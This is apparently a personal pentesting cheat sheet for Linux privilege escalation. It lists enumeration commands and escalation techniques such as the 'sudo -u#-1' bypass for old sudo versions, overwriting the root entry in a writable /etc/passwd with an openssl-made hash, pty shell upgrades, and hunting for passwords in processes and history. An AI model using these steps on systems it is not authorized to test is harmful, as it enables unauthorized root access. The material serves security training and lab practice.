- Hacktricks Checklist
- GTFOBins
- Compiled Kernel Exploits
- [[Linux Privilege Escalation]]
User with valid credentials (sudo -l):
sudo -lto see what binaries you can run withsudo, head over to GTFOBinssudo -Vto get version, below 1.28 can usesudo -u#-1 /bin/bash
SUID Binaries
find / -perm -u=s -type f 2>/dev/nullfind / -perm -4000 2>/dev/null- Head over to GTFOBins
Kernel Exploits:
uname -a&&searchsploit- Compiled Kernel Exploits
~/exploitsand Privilege Escalation notes
Writable /etc/passwd
ls -la /etc/passwdto see if you have write permissionsopenssl passwd -1 -salt hacker hackerand replacerootpassword entry (or deletex)su roothacker
-
Upgrade your shell if it's not fully interactive
-
python -c 'import pty;pty.spawn("/bin/bash")' -
python -c 'import pty;pty.spawn("/bin/sh")' -
python3 -c 'import pty;pty.spawn("/bin/bash")' -
python3 -c 'import pty;pty.spawn("/bin/sh")'
-
-
Get system context current user, hostname, groups
whoamiidhostname
-
Get kernel version && check for vulnerability
uname -a&&searchsploit
-
Check for sudo (valid password)
sudo -lsudo -V(below 1.28sudo -u#-1 /bin/bash)
-
Check for SUID Binaries
find / -perm -u=s -type f 2>/dev/nullfind / -perm -4000 2>/dev/null
-
Check for users && writable /etc/passwd
ls -la /etc/passwdcat /etc/passwd
-
Check environment
echo $PATH(env || set) 2>/dev/nullhistorycat ~/.bashrc
-
Check processes
ps auxps -efwatch -n 1 "ps -aux | grep pass"
-
Check cronjobs
ls -lah /etc/cron*cat /var/log/syslog | grep croncat /var/log/cron.loggrep "CRON" /var/log/syslogls -la /etc/cron.dls -la /etc/cron.hourly
-
Check your writable/usable files & file permissions
find / -writable -type d 2>/dev/nullfind / -perm -u=s -type f 2>/dev/nullls -la
-
Check networking & services running on localhost
ip anetstatss -anp